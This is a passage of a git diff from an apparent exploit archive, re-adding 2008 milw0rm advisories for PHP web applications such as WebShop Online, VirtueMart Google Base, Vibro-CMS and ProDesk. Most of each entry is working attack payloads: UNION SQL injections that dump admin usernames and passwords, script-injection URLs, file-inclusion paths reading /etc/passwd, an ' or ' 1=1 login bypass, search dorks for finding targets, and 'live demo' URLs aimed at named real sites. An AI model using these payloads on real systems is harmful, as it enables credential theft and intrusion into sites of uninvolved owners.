-[SQL] http://webbdomain.com/php/webshopir/detail.php?image=u0646ur0xm.gif&name=g4n0k&price=20&id=-13'+UNION+ALL+SELECT+1,2,3,4,5,6,user(),8,9,10,11--
-      http://webbdomain.com/php/webshopir/detail.php?image=u0646ur0xm.gif&name=g4n0k&price=20&id=-13' UNION ALL SELECT 1,2,3,4,5,6,concat(username,0x3a,password),8,9,10,11+FROM+admin--+AND+'GNK'='GNK
-[XSS] http://webbdomain.com/php/webshopir/detail.php?image=u0646ur0xm.gif&name=g4n0k%22%3E%3Cscript%3Ealert(%27G4N0K%27)%3C/script%3E&price=20&id=13
-[XSS] http://webbdomain.com/php/webshopir/detail.php?image=u0646ur0xm.gif&name=g4n0k%22%3E%3Cscript%3Ealert(%27G4N0K%27)%3C/script%3E
-
-
---[ Greetz ]--
-[~] ALLAH
-[~] Tornado2800 
-[~] Hussain-X 
-
-//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
-//ALLAH, forgimme...
-
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-exit(); //EoX
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-
-# milw0rm.com [2008-11-04]
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+                            			IN THE NAME OF ALLAH
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+Multi Languages WebShop Online (name:XSS|id:SQLi) Multiple Remote Vulnerabilities
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+[~] Script:         	Multi Languages WebShop Online
+[~] Language :         	PHP
+[~] Website[0]:     	http://webbdomain.com/php/webshopir/
+[~] Website[1]:     	http://www.hotscripts.com/Detailed/84437.html
+[~] Type :             	Commercial
+[~] Report-Date :     	04/11/2008
+
+
+--[ Founder ]--
+G4N0K 
+
+
+--[ Exploit ]--
+SQL => id
+[+] http://localhost/[path]/detail.php?image=u0646ur0xm.gif&name=g4n0k&price=20&id=-13'+UNION+ALL+SELECT+1,2,3,4,5,6,user(),8,9,10,11--
+    http://webbdomain.com/php/webshopir/detail.php?image=u0646ur0xm.gif&name=g4n0k&price=20&id=-13' UNION ALL SELECT 1,2,3,4,5,6,concat(username,0x3a,password),8,9,10,11+FROM+admin--+AND+'GNK'='GNK
+
+XSS => name
+[+][0] http://localhost/[path]/detail.php?image=u0646ur0xm.gif&name=[XSS]&price=20&id=13
+[+][1] http://localhost/[path]/detail.php?image=u0646ur0xm.gif&name=[XSS]
+
+
+
+--[ L!ve ]--
+[SQL] http://webbdomain.com/php/webshopir/detail.php?image=u0646ur0xm.gif&name=g4n0k&price=20&id=-13'+UNION+ALL+SELECT+1,2,3,4,5,6,user(),8,9,10,11--
+      http://webbdomain.com/php/webshopir/detail.php?image=u0646ur0xm.gif&name=g4n0k&price=20&id=-13' UNION ALL SELECT 1,2,3,4,5,6,concat(username,0x3a,password),8,9,10,11+FROM+admin--+AND+'GNK'='GNK
+[XSS] http://webbdomain.com/php/webshopir/detail.php?image=u0646ur0xm.gif&name=g4n0k%22%3E%3Cscript%3Ealert(%27G4N0K%27)%3C/script%3E&price=20&id=13
+[XSS] http://webbdomain.com/php/webshopir/detail.php?image=u0646ur0xm.gif&name=g4n0k%22%3E%3Cscript%3Ealert(%27G4N0K%27)%3C/script%3E
+
+
+--[ Greetz ]--
+[~] ALLAH
+[~] Tornado2800 
+[~] Hussain-X 
+
+//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
+//ALLAH, forgimme...
+
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+exit(); //EoX
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+# milw0rm.com [2008-11-04]
diff --git a/platforms/php/webapps/6975.txt b/platforms/php/webapps/6975.txt
index b88592bc5..51baf9c47 100755
--- a/platforms/php/webapps/6975.txt
+++ b/platforms/php/webapps/6975.txt
@@ -1,43 +1,43 @@
-================================================================================================================================
-
-
-[o] VirtueMart Google Base Component 1.1 Remote File Inclusion Vulnerability
-
-       Software : com_googlebase version 1.1
-       Vendor   : www.e-commerce-solution.co.uk
-       Download : http://www.joomlahacks.com/   [free download]
-       Author   : NoGe
-       Contact  : noge[dot]code[at]gmail[dot]com
-       Blog     : http://evilc0de.blogspot.com
-
-
-================================================================================================================================
-
-
-  [o] Vulnerable file
-
-       administrator/components/com_googlebase/admin.googlebase.php
-
-        include( $mosConfig_absolute_path.'/administrator/components/com_virtuemart/virtuemart.cfg.php' );
-
-
-
-  [o] Exploit
-
-       http://localhost/[path]/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=[evilcode]
-
-
-================================================================================================================================
-
-
-  [o] Greetz
-
-       MainHack BrotherHood [ http://serverisdown.org/blog/]
-       Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa
-       H312Y yooogy mousekill }^-^{ kaka11  martfella
-       skulmatic olibekas ulga Cungkee k1tk4t str0ke
-
-        
-================================================================================================================================
-
-# milw0rm.com [2008-11-04]
+================================================================================================================================
+
+
+[o] VirtueMart Google Base Component 1.1 Remote File Inclusion Vulnerability
+
+       Software : com_googlebase version 1.1
+       Vendor   : www.e-commerce-solution.co.uk
+       Download : http://www.joomlahacks.com/   [free download]
+       Author   : NoGe
+       Contact  : noge[dot]code[at]gmail[dot]com
+       Blog     : http://evilc0de.blogspot.com
+
+
+================================================================================================================================
+
+
+  [o] Vulnerable file
+
+       administrator/components/com_googlebase/admin.googlebase.php
+
+        include( $mosConfig_absolute_path.'/administrator/components/com_virtuemart/virtuemart.cfg.php' );
+
+
+
+  [o] Exploit
+
+       http://localhost/[path]/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=[evilcode]
+
+
+================================================================================================================================
+
+
+  [o] Greetz
+
+       MainHack BrotherHood [ http://serverisdown.org/blog/]
+       Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa
+       H312Y yooogy mousekill }^-^{ kaka11  martfella
+       skulmatic olibekas ulga Cungkee k1tk4t str0ke
+
+        
+================================================================================================================================
+
+# milw0rm.com [2008-11-04]
diff --git a/platforms/php/webapps/6976.txt b/platforms/php/webapps/6976.txt
index 46214d4fa..03e72e665 100755
--- a/platforms/php/webapps/6976.txt
+++ b/platforms/php/webapps/6976.txt
@@ -1,44 +1,44 @@
-=======================================================================================================================================
-
-
-  [o] com_ongumatimesheet20 4 Beta Remote File Inclusion Vulnerability
-
-       Software : com_ongumatimesheet20 version 4 Beta
-       Download : http://joomlacode.org/gf/project/ongumasa/frs/
-       Author   : NoGe
-       Contact  : noge[dot]code[at]gmail[dot]com
-       Blog     : http://evilc0de.blogspot.com [promosi :p]
-
-
-=======================================================================================================================================
-
-
-  [o] Vulnerable file
-
-       administrator/components/com_ongumatimesheet20/lib/onguma.class.php
-
-        include_once($mosConfig_absolute_path.'/includes/patTemplate/patError.php');
-        include_once($mosConfig_absolute_path.'/includes/patTemplate/patErrorManager.php');
-        include_once($mosConfig_absolute_path.'/includes/patTemplate/patTemplate.php');
-
-
-
-  [o] Exploit
-
-       http://localhost/[path]/administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=[evilcode]
-
-
-=======================================================================================================================================
-
-
-  [o] Greetz
-
-       MainHack BrotherHood [ http://serverisdown.org/blog/]
-       Vrs-hCk OoN_BoY Paman
-       H312Y yooogy mousekill }^-^{ kaka11  martfella
-       skulmatic olibekas ulga Cungkee k1tk4t str0ke
-
-        
-=======================================================================================================================================
-
-# milw0rm.com [2008-11-04]
+=======================================================================================================================================
+
+
+  [o] com_ongumatimesheet20 4 Beta Remote File Inclusion Vulnerability
+
+       Software : com_ongumatimesheet20 version 4 Beta
+       Download : http://joomlacode.org/gf/project/ongumasa/frs/
+       Author   : NoGe
+       Contact  : noge[dot]code[at]gmail[dot]com
+       Blog     : http://evilc0de.blogspot.com [promosi :p]
+
+
+=======================================================================================================================================
+
+
+  [o] Vulnerable file
+
+       administrator/components/com_ongumatimesheet20/lib/onguma.class.php
+
+        include_once($mosConfig_absolute_path.'/includes/patTemplate/patError.php');
+        include_once($mosConfig_absolute_path.'/includes/patTemplate/patErrorManager.php');
+        include_once($mosConfig_absolute_path.'/includes/patTemplate/patTemplate.php');
+
+
+
+  [o] Exploit
+
+       http://localhost/[path]/administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=[evilcode]
+
+
+=======================================================================================================================================
+
+
+  [o] Greetz
+
+       MainHack BrotherHood [ http://serverisdown.org/blog/]
+       Vrs-hCk OoN_BoY Paman
+       H312Y yooogy mousekill }^-^{ kaka11  martfella
+       skulmatic olibekas ulga Cungkee k1tk4t str0ke
+
+        
+=======================================================================================================================================
+
+# milw0rm.com [2008-11-04]
diff --git a/platforms/php/webapps/6977.txt b/platforms/php/webapps/6977.txt
index acd786332..14e5a324e 100755
--- a/platforms/php/webapps/6977.txt
+++ b/platforms/php/webapps/6977.txt
@@ -1,44 +1,44 @@
-post Card ( catid )  Remote SQL Injection Vulnerability
-___________________________________
-
-Author: Hussin X
-
-Home :  www.IQ-TY.com  & www.TrYaG.cc
-
-MaiL : darkangeL_G85@Yahoo.CoM
-___________________________________
-
-script    : http://webbdomain.com/php/postcarden/index2.php
-script    : http://webbdomain.com/php/postcardir/index2.php
-
-DorK   : inurl:choosecard.php?catid=
-_____
-
-ExploiT & Demo
-_______
-
-post Card  v 1.01
-
-http://webbdomain.com/php/postcarden/choosecard.php?catid=-1002+union+select+concat(username,0x3a,password),2,3+from+admin--
-
-
-post Card  v 1.02
-http://webbdomain.com/php/postcardir/choosecard.php?catid=-1002+union+select+concat(username,0x3a,password),2,3+from+admin--
-
-
-Note : Exploit in Properties  Picture
-
-
-Login :
-______
-/admin
-
-
-
-
-Greetz : All my freind
-
- 
-  Im IraQi        |         Im TrYaGi
-
-# milw0rm.com [2008-11-04]
+post Card ( catid )  Remote SQL Injection Vulnerability
+___________________________________
+
+Author: Hussin X
+
+Home :  www.IQ-TY.com  & www.TrYaG.cc
+
+MaiL : darkangeL_G85@Yahoo.CoM
+___________________________________
+
+script    : http://webbdomain.com/php/postcarden/index2.php
+script    : http://webbdomain.com/php/postcardir/index2.php
+
+DorK   : inurl:choosecard.php?catid=
+_____
+
+ExploiT & Demo
+_______
+
+post Card  v 1.01
+
+http://webbdomain.com/php/postcarden/choosecard.php?catid=-1002+union+select+concat(username,0x3a,password),2,3+from+admin--
+
+
+post Card  v 1.02
+http://webbdomain.com/php/postcardir/choosecard.php?catid=-1002+union+select+concat(username,0x3a,password),2,3+from+admin--
+
+
+Note : Exploit in Properties  Picture
+
+
+Login :
+______
+/admin
+
+
+
+
+Greetz : All my freind
+
+ 
+  Im IraQi        |         Im TrYaGi
+
+# milw0rm.com [2008-11-04]
diff --git a/platforms/php/webapps/6978.txt b/platforms/php/webapps/6978.txt
index 0cd1f6566..e79808b91 100755
--- a/platforms/php/webapps/6978.txt
+++ b/platforms/php/webapps/6978.txt
@@ -1,26 +1,26 @@
-/*
-   -------------------------------------------------------
-   Vibro-CMS Multiple Remote SQL Injection Vulnerabilities
-   -------------------------------------------------------
-   Discovered By StAkeR[at]hotmail[dot]it
-   http://www.niclor.net/prodotti/Vibro-CMS
-   -------------------------------------------------------
-
-   * Remote SQL Injection
-   * Note: Works Regardless PHP.ini Settings
-   
-   - view_pagina.php?pId=1 union select null,concat_ws(0x3a,user(),version(),database()),null/*
-   - view_sub-pagina.php?pId=1 union select 0,concat(database(),0x3a,user()),version(),3/*
-   - view_news.php?nID=4 union select 0,0,user(),1,2,3,4,database(),6,7,8,version(),0/*
-   
-   * Demo
-   
-   - http://www.niclor.net/prodotti/Vibro-CMS/view_pagina.php?pId=1 union select 0,concat_ws(0x3a,user(),version(),database()),0/*
-   - http://www.niclor.net/prodotti/Vibro-CMS/ view_sub-pagina.php?pId=1 union select 0,concat(database(),0x3a,user()),version(),3/*
-   - http://www.niclor.net/prodotti/Vibro-CMS/view_news.php?nID=4 union select 0,0,user(),1,2,3,4,database(),6,7,8,version(),0/*
-   
-   
-
-*/
-
-# milw0rm.com [2008-11-04]
+/*
+   -------------------------------------------------------
+   Vibro-CMS Multiple Remote SQL Injection Vulnerabilities
+   -------------------------------------------------------
+   Discovered By StAkeR[at]hotmail[dot]it
+   http://www.niclor.net/prodotti/Vibro-CMS
+   -------------------------------------------------------
+
+   * Remote SQL Injection
+   * Note: Works Regardless PHP.ini Settings
+   
+   - view_pagina.php?pId=1 union select null,concat_ws(0x3a,user(),version(),database()),null/*
+   - view_sub-pagina.php?pId=1 union select 0,concat(database(),0x3a,user()),version(),3/*
+   - view_news.php?nID=4 union select 0,0,user(),1,2,3,4,database(),6,7,8,version(),0/*
+   
+   * Demo
+   
+   - http://www.niclor.net/prodotti/Vibro-CMS/view_pagina.php?pId=1 union select 0,concat_ws(0x3a,user(),version(),database()),0/*
+   - http://www.niclor.net/prodotti/Vibro-CMS/ view_sub-pagina.php?pId=1 union select 0,concat(database(),0x3a,user()),version(),3/*
+   - http://www.niclor.net/prodotti/Vibro-CMS/view_news.php?nID=4 union select 0,0,user(),1,2,3,4,database(),6,7,8,version(),0/*
+   
+   
+
+*/
+
+# milw0rm.com [2008-11-04]
diff --git a/platforms/php/webapps/6979.txt b/platforms/php/webapps/6979.txt
index c46db3da2..60c0666d1 100755
--- a/platforms/php/webapps/6979.txt
+++ b/platforms/php/webapps/6979.txt
@@ -1,22 +1,22 @@
-/*
-   ---------------------------------------------------
-   Puglia_Landscape Local File Inclusion Vulnerability
-   ---------------------------------------------------
-   Discovered By StAkeR[at]hotmail[dot]it
-   http://www.niclor.net/prodotti/Puglia_Landscape
-   ---------------------------------------------------
-   
-   * Local File Inclusion
-   * Note: Magic_Quotes_GPC Off
-   
-   - index.php?id=../../../../../../../[Local File and NullByte]
-   - index.php?id=../../../../../../../etc/passwd%00
-   
-   * Demo
-   - http://www.niclor.net/prodotti/Puglia_Landscape/index.php?id=../../../../../../../etc/passwd%00
- 
-   
-
-*/
-
-# milw0rm.com [2008-11-04]
+/*
+   ---------------------------------------------------
+   Puglia_Landscape Local File Inclusion Vulnerability
+   ---------------------------------------------------
+   Discovered By StAkeR[at]hotmail[dot]it
+   http://www.niclor.net/prodotti/Puglia_Landscape
+   ---------------------------------------------------
+   
+   * Local File Inclusion
+   * Note: Magic_Quotes_GPC Off
+   
+   - index.php?id=../../../../../../../[Local File and NullByte]
+   - index.php?id=../../../../../../../etc/passwd%00
+   
+   * Demo
+   - http://www.niclor.net/prodotti/Puglia_Landscape/index.php?id=../../../../../../../etc/passwd%00
+ 
+   
+
+*/
+
+# milw0rm.com [2008-11-04]
diff --git a/platforms/php/webapps/6980.txt b/platforms/php/webapps/6980.txt
index 594786b7e..dcc3dce37 100755
--- a/platforms/php/webapps/6980.txt
+++ b/platforms/php/webapps/6980.txt
@@ -1,36 +1,36 @@
-[~]-------------------------------------------------------------------------------------------------------
-[~] Joomla Component ProDesk v 1.0 AND 1.2 (com_pro_desk&include_file) Local File Inclusion Vulnerability
-[~]
-[~] http://joomlashowroom.com/index.php/Pro-Desk-Support-Center/Pro-Desk-Support-Center.html
-[~]  
-[~] 
-[~] ----------------------------------------------------------------------------------------------------
-[~] Bug founded by d3v1l [Avram Marius]
-[~]
-[~] Date: 4.11.2008
-[~]
-[~]
-[~] d3v1l@spoofer.com http://security-sh3ll.com
-[~]
-[~] -----------------------------------------------------------------------------------------------------
-[~] Greetz tO ALL:-
-[~]
-[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )
-[~]
-[~] milw0rm staff
-[~]------------------------------------------------------------------------------------------------------
-[~] Exploit :-
-[~]
-[~] http://site.com/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd
-[~]  
-[~] Ex :- v 1.2
-[~]
-[~] http://www.reviewyou.com.au/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd
-[~]-------------------------------------------------------------------------------------------------------
-[~] 
-[~] Ex :- v1.0 
-[~]  
-[~] http://www.ppcmanagement.com/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd 
-[~]---------------------------------------------------------------------------------------------------------
-
-# milw0rm.com [2008-11-04]
+[~]-------------------------------------------------------------------------------------------------------
+[~] Joomla Component ProDesk v 1.0 AND 1.2 (com_pro_desk&include_file) Local File Inclusion Vulnerability
+[~]
+[~] http://joomlashowroom.com/index.php/Pro-Desk-Support-Center/Pro-Desk-Support-Center.html
+[~]  
+[~] 
+[~] ----------------------------------------------------------------------------------------------------
+[~] Bug founded by d3v1l [Avram Marius]
+[~]
+[~] Date: 4.11.2008
+[~]
+[~]
+[~] d3v1l@spoofer.com http://security-sh3ll.com
+[~]
+[~] -----------------------------------------------------------------------------------------------------
+[~] Greetz tO ALL:-
+[~]
+[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )
+[~]
+[~] milw0rm staff
+[~]------------------------------------------------------------------------------------------------------
+[~] Exploit :-
+[~]
+[~] http://site.com/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd
+[~]  
+[~] Ex :- v 1.2
+[~]
+[~] http://www.reviewyou.com.au/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd
+[~]-------------------------------------------------------------------------------------------------------
+[~] 
+[~] Ex :- v1.0 
+[~]  
+[~] http://www.ppcmanagement.com/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd 
+[~]---------------------------------------------------------------------------------------------------------
+
+# milw0rm.com [2008-11-04]
diff --git a/platforms/php/webapps/6981.txt b/platforms/php/webapps/6981.txt
index 5bcae25a2..ec7b9423e 100755
--- a/platforms/php/webapps/6981.txt
+++ b/platforms/php/webapps/6981.txt
@@ -1,56 +1,56 @@
-*********************************************************************************************        
-[!]                                                                                       [!]
-[!] OOOO             O                                 OOOOOOOOO                          [!]
-[!]O    O            O                                 O      O                           [!]
-[!]O                 O                                       O                            [!]
-[!]O      OOOO  OOOO OOOOOO     OOOO   OOO OO               O      OOOO   OO OO     OOOO  [!]
-[!]O       OOO  OOO  O     O   O    O    OO  O             O      O    O   OO  O   O    O [!]
-[!]O        OO  OO   O     O   OOOOOO    O     *******    O       O    O   O   O   OOOOOO [!]
-[!]O    O    OOOO    O     O   O         O               O      O O    O   O   O   O      [!]
-[!] OOOO      OO     OOOOOO     OOOO   OOOOOO           OOOOOOOOO  OOOO   OOO OOO   OOOO  [!]
-[!]          OO                                                                           [!]
-[!]         OO                                                                            [!]
-[!]        OO                          Proud To Be MoroCCaN                               [!]
-[!]       OO                                                                              [!]
-*********************************************************************************************
-Maghribi WnaftakhaR , Wali Ma3ajboCh YantahaR , OyaktaB 3la 9abro , Ana MayeT Men Al9aheR
----------------------------------------------------------------------------------------------
-=                Vibro-School CMS (nID) Remote SQL injection Vulnerability                  =
----------------------------------------------------------------------------------------------
-
----------------------------------------------------------------------------------------------
--===========================================================================================-
--=                  SQL InjEction By : Cyber-Zone                                          =-
--=                                                                                         =-
--=                  E-mail : paradis_des_fous@hotmail.fr                                   =-
--=                                                                                         =-
--=                  Home : WwW.IQ-Ty.CoM                                                   =-
--===========================================================================================-
----------------------------------------------------------------------------------------------
-
-Download : http://www.niclor.net/prodotti/Vibro-School-CMS
-
-
-dork    : Vibro-School CMS by nicLOR.net
-
-Exploit : http://localhost/Vibro-School-CMS/view_news.php?nID=-3+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13--
-
-
-live demo :
-
-
-http://www.niclor.net/prodotti/Vibro-School-CMS/view_news.php?nID=-3+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13--
-
----------------------------------------------------------------------------------------------
--======================================= ThanX To ==========================================-
--=            Hussin X , CraCkEr , Force-Major , WaLid , GeneraL-Oujda , Oujda-Lord        =-
--=                                                                                         =-
--=                         WwW.IQ-ty.Com , No-Exploit (JIKO)                               =-
--=                                                                                         =-
--=                               Oujda SeCurity TeaM                                       =-
--===========================================================================================-
----------------------------------------------------------------------------------------------
-
-Spicial ThanX To My Friend StaCk & All KazaWa Boys :)
-
-# milw0rm.com [2008-11-04]
+*********************************************************************************************        
+[!]                                                                                       [!]
+[!] OOOO             O                                 OOOOOOOOO                          [!]
+[!]O    O            O                                 O      O                           [!]
+[!]O                 O                                       O                            [!]
+[!]O      OOOO  OOOO OOOOOO     OOOO   OOO OO               O      OOOO   OO OO     OOOO  [!]
+[!]O       OOO  OOO  O     O   O    O    OO  O             O      O    O   OO  O   O    O [!]
+[!]O        OO  OO   O     O   OOOOOO    O     *******    O       O    O   O   O   OOOOOO [!]
+[!]O    O    OOOO    O     O   O         O               O      O O    O   O   O   O      [!]
+[!] OOOO      OO     OOOOOO     OOOO   OOOOOO           OOOOOOOOO  OOOO   OOO OOO   OOOO  [!]
+[!]          OO                                                                           [!]
+[!]         OO                                                                            [!]
+[!]        OO                          Proud To Be MoroCCaN                               [!]
+[!]       OO                                                                              [!]
+*********************************************************************************************
+Maghribi WnaftakhaR , Wali Ma3ajboCh YantahaR , OyaktaB 3la 9abro , Ana MayeT Men Al9aheR
+---------------------------------------------------------------------------------------------
+=                Vibro-School CMS (nID) Remote SQL injection Vulnerability                  =
+---------------------------------------------------------------------------------------------
+
+---------------------------------------------------------------------------------------------
+-===========================================================================================-
+-=                  SQL InjEction By : Cyber-Zone                                          =-
+-=                                                                                         =-
+-=                  E-mail : paradis_des_fous@hotmail.fr                                   =-
+-=                                                                                         =-
+-=                  Home : WwW.IQ-Ty.CoM                                                   =-
+-===========================================================================================-
+---------------------------------------------------------------------------------------------
+
+Download : http://www.niclor.net/prodotti/Vibro-School-CMS
+
+
+dork    : Vibro-School CMS by nicLOR.net
+
+Exploit : http://localhost/Vibro-School-CMS/view_news.php?nID=-3+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13--
+
+
+live demo :
+
+
+http://www.niclor.net/prodotti/Vibro-School-CMS/view_news.php?nID=-3+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13--
+
+---------------------------------------------------------------------------------------------
+-======================================= ThanX To ==========================================-
+-=            Hussin X , CraCkEr , Force-Major , WaLid , GeneraL-Oujda , Oujda-Lord        =-
+-=                                                                                         =-
+-=                         WwW.IQ-ty.Com , No-Exploit (JIKO)                               =-
+-=                                                                                         =-
+-=                               Oujda SeCurity TeaM                                       =-
+-===========================================================================================-
+---------------------------------------------------------------------------------------------
+
+Spicial ThanX To My Friend StaCk & All KazaWa Boys :)
+
+# milw0rm.com [2008-11-04]
diff --git a/platforms/php/webapps/6982.txt b/platforms/php/webapps/6982.txt
index 74450178e..c502edbab 100755
--- a/platforms/php/webapps/6982.txt
+++ b/platforms/php/webapps/6982.txt
@@ -1,55 +1,55 @@
-*********************************************************************************************        
-[!]                                                                                       [!]
-[!] OOOO             O                                 OOOOOOOOO                          [!]
-[!]O    O            O                                 O      O                           [!]
-[!]O                 O                                       O                            [!]
-[!]O      OOOO  OOOO OOOOOO     OOOO   OOO OO               O      OOOO   OO OO     OOOO  [!]
-[!]O       OOO  OOO  O     O   O    O    OO  O             O      O    O   OO  O   O    O [!]
-[!]O        OO  OO   O     O   OOOOOO    O     *******    O       O    O   O   O   OOOOOO [!]
-[!]O    O    OOOO    O     O   O         O               O      O O    O   O   O   O      [!]
-[!] OOOO      OO     OOOOOO     OOOO   OOOOOO           OOOOOOOOO  OOOO   OOO OOO   OOOO  [!]
-[!]          OO                                                                           [!]
-[!]         OO                                                                            [!]
-[!]        OO                          Proud To Be MoroCCaN                               [!]
-[!]       OO                                                                              [!]
-*********************************************************************************************
-Maghribi WnaftakhaR , Wali Ma3ajboCh YantahaR , OyaktaB 3la 9abro , Ana MayeT Men Al9aheR
----------------------------------------------------------------------------------------------
-=          CMS-School 2005 (showarticle.php) Remote SQL injection Vulnerability             =
----------------------------------------------------------------------------------------------
-
----------------------------------------------------------------------------------------------
--===========================================================================================-
--=                  SQL InjEction By : Cyber-Zone                                          =-
--=                                                                                         =-
--=                  E-mail : paradis_des_fous@hotmail.fr                                   =-
--=                                                                                         =-
--=                  Home : WwW.IQ-Ty.CoM                                                   =-
--===========================================================================================-
----------------------------------------------------------------------------------------------
-
-Download : http://www.niclor.net/prodotti/cms_school/
-
-
-
-Exploit : http://localhost/cms_school/showarticle.php?aID=-4+union+select+version(),2,3--
-
-
-live demo :
-
-
-http://www.niclor.net/prodotti/cms_school/showarticle.php?aID=-4+union+select+version(),2,3--
-
----------------------------------------------------------------------------------------------
--======================================= ThanX To ==========================================-
--=            Hussin X , CraCkEr , Force-Major , WaLid , GeneraL-Oujda , Oujda-Lord        =-
--=                                                                                         =-
--=                         WwW.IQ-ty.Com , No-Exploit (JIKO)                               =-
--=                                                                                         =-
--=                               Oujda SeCurity TeaM                                       =-
--===========================================================================================-
----------------------------------------------------------------------------------------------
-
-Spicial ThanX To My Friend StaCk & All KazaWa Boys :)
-
-# milw0rm.com [2008-11-04]
+*********************************************************************************************        
+[!]                                                                                       [!]
+[!] OOOO             O                                 OOOOOOOOO                          [!]
+[!]O    O            O                                 O      O                           [!]
+[!]O                 O                                       O                            [!]
+[!]O      OOOO  OOOO OOOOOO     OOOO   OOO OO               O      OOOO   OO OO     OOOO  [!]
+[!]O       OOO  OOO  O     O   O    O    OO  O             O      O    O   OO  O   O    O [!]
+[!]O        OO  OO   O     O   OOOOOO    O     *******    O       O    O   O   O   OOOOOO [!]
+[!]O    O    OOOO    O     O   O         O               O      O O    O   O   O   O      [!]
+[!] OOOO      OO     OOOOOO     OOOO   OOOOOO           OOOOOOOOO  OOOO   OOO OOO   OOOO  [!]
+[!]          OO                                                                           [!]
+[!]         OO                                                                            [!]
+[!]        OO                          Proud To Be MoroCCaN                               [!]
+[!]       OO                                                                              [!]
+*********************************************************************************************
+Maghribi WnaftakhaR , Wali Ma3ajboCh YantahaR , OyaktaB 3la 9abro , Ana MayeT Men Al9aheR
+---------------------------------------------------------------------------------------------
+=          CMS-School 2005 (showarticle.php) Remote SQL injection Vulnerability             =
+---------------------------------------------------------------------------------------------
+
+---------------------------------------------------------------------------------------------
+-===========================================================================================-
+-=                  SQL InjEction By : Cyber-Zone                                          =-
+-=                                                                                         =-
+-=                  E-mail : paradis_des_fous@hotmail.fr                                   =-
+-=                                                                                         =-
+-=                  Home : WwW.IQ-Ty.CoM                                                   =-
+-===========================================================================================-
+---------------------------------------------------------------------------------------------
+
+Download : http://www.niclor.net/prodotti/cms_school/
+
+
+
+Exploit : http://localhost/cms_school/showarticle.php?aID=-4+union+select+version(),2,3--
+
+
+live demo :
+
+
+http://www.niclor.net/prodotti/cms_school/showarticle.php?aID=-4+union+select+version(),2,3--
+
+---------------------------------------------------------------------------------------------
+-======================================= ThanX To ==========================================-
+-=            Hussin X , CraCkEr , Force-Major , WaLid , GeneraL-Oujda , Oujda-Lord        =-
+-=                                                                                         =-
+-=                         WwW.IQ-ty.Com , No-Exploit (JIKO)                               =-
+-=                                                                                         =-
+-=                               Oujda SeCurity TeaM                                       =-
+-===========================================================================================-
+---------------------------------------------------------------------------------------------
+
+Spicial ThanX To My Friend StaCk & All KazaWa Boys :)
+
+# milw0rm.com [2008-11-04]
diff --git a/platforms/php/webapps/6983.txt b/platforms/php/webapps/6983.txt
index 3a4cbfd72..363322c4d 100755
--- a/platforms/php/webapps/6983.txt
+++ b/platforms/php/webapps/6983.txt
@@ -1,27 +1,27 @@
-###########################################################################
-      ______    __  __   ______          __                ______                   
-     / ____/___ \ \/ /  / ____/___  ____/ /__  __________ /_  __/__  ____ _____ ___
-    / __/ / __ `/\  /  / /   / __ \/ __  / _ \/ ___/ ___/  / / / _ \/ __ `/ __ `__ \
-   / /___/ /_/ / / /  / /___/ /_/ / /_/ /  __/ /  (__  )  / / /  __/ /_/ / / / / / /
-  /_____/\__, / /_/   \____/\____/\__,_/\___/_/  /____/  /_/  \___/\__,_/_/ /_/ /_/
-        /____/       EgY Coders Vulnerability Research TM                                    
-
-# [~] Discovered by : Hakxer
-# [~] Type Gap : WEBBDOMAIN Petition Auth Bypass
-# [~] Script :http://webbdomain.com/php/petition/petition.php
-# [~] Greetz : Allah
-##########################################################################
-
-|| Auth Bypass ||
-
-http://webbdomain.com/php/petition/admin/
-
-Username : admin ' or ' 1=1
-password : Hakxer
-
-Logged In ...
-
-#  Proud To be a Muslim #
-#_=END=_#
-
-# milw0rm.com [2008-11-04]
+###########################################################################
+      ______    __  __   ______          __                ______                   
+     / ____/___ \ \/ /  / ____/___  ____/ /__  __________ /_  __/__  ____ _____ ___
+    / __/ / __ `/\  /  / /   / __ \/ __  / _ \/ ___/ ___/  / / / _ \/ __ `/ __ `__ \
+   / /___/ /_/ / / /  / /___/ /_/ / /_/ /  __/ /  (__  )  / / /  __/ /_/ / / / / / /
+  /_____/\__, / /_/   \____/\____/\__,_/\___/_/  /____/  /_/  \___/\__,_/_/ /_/ /_/
+        /____/       EgY Coders Vulnerability Research TM                                    
+
+# [~] Discovered by : Hakxer
+# [~] Type Gap : WEBBDOMAIN Petition Auth Bypass
